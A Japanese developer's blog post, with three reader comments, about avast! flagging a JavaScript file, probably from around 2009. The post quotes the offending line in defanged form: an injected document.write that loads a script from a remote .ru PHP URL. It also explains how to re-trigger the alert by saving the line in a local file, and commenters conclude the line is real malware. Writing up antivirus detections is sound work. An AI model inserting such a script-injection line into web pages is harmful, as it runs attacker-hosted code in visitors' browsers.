それなりブログ

とあるWebエンジニアのそれなりのブログ、JavaScript/Node.js/Python/PHP/ゲーム作成 など

avast! が特定文字列へ HTML:Script-inf をアラート

個人用PCは avast! を使いまくりなんですが、
とあるサイトを見たときに、原因不明なエラーが出まして、
その一部始終のメモとなります。

バージョンは、「avast! version 4.8 Home Edition」です。
ブラウザ環境は Windows-XP + IE です。(FireFoxだと出ない)

avast!が出した警告内容

avast-alert1215
avast-alert1215 posted by (C)kjirou

↓ウィルス内容部分の拡大

マルウェアの名前   = HTML:Script-inf
マルウェアのタイプ = ウイルス/ワーム
VPSバージョン      = 091214-1, 2009/12/14

んで、上記画像だと消しちゃってますが、
どのファイルに反応しているかというと、とあるJavaScriptファイル(普通に .js の)でした。

何に反応してアラート?

結論から申しますと・・・

document.write('<script src=http://pok@@@upca.ru/delivery/ug_gl_l_v.php ></script>');

JSソース内の、この行部分に反応してアラートを出しておりました。

!! 途中の @@@ は本当はありません !!
!! ただ、そのまま書くと avast! が反応しちゃうことがあるので、挿入しています !!

この行を消すと、出なくなりました。

もっと簡単にアラートを出す

上記ではサイトに置いたjsファイルに反応しましたが、
ローカルに上記ソースを書いて保存してもアラートされます。

例えば、以下の手順で意図的に発生させることができます。

任意の.js拡張子のファイルをデスクトップに作って
 ↓
上記のdocument.write行のソースを、@@@を取って貼り付けて
 ↓
テキストエディタの保存を行おうとすると、avast! が警告を出します。

どうも、行と完全一致的に反応するようで、
document.write や script や 謎の海外ドメイン や phpスクリプト名
それぞれに反応はしません。
なので、ドメインでもパスでも、どこか1文字を削って保存した場合は問題有りません。

HTML:Script-inf って?

んで、肝心の何が悪いかについては、わからねっす。

ググっても出ないし、avast! サイトを軽く探しても見つからないので、
興味のあったり親切な方は、公式サイトを探して教えて下さい・・・。

推測ですが、かつて実害のあったスクリプトのパターンを、
avast! がホワイトリスト的に弾いてるんじゃないかなぁ、と。

現状の実害は?

そもそも、そのサイトが何のサイトかすら、よくわからなく・・・。

まぁ、知らない内にサイトに設置してあるJSファイルに書かれてたりしたら、
絶対消した方がいいとだけは言えますけども。


3 Responses to “avast! が特定文字列へ HTML:Script-inf をアラート”

  • 匿名 より:

    FireFoxでも出てしまいますよ。youtube見ようとしたら、アラートとサイレンが出てしまいました。

  • 今ひとたびの幻 より:

    上のスクリプトですが、avast! だけでなく、カスペルスキーでも同じ反応をしますね。

  • kjirou より:

    報告ありがとうございます

    当時は誤検出を疑ったのですが
    avast! でも現在も反応しますので、ウィルスだったようですね


コメントを残す

メールアドレスが公開されることはありません。

Categories

Archives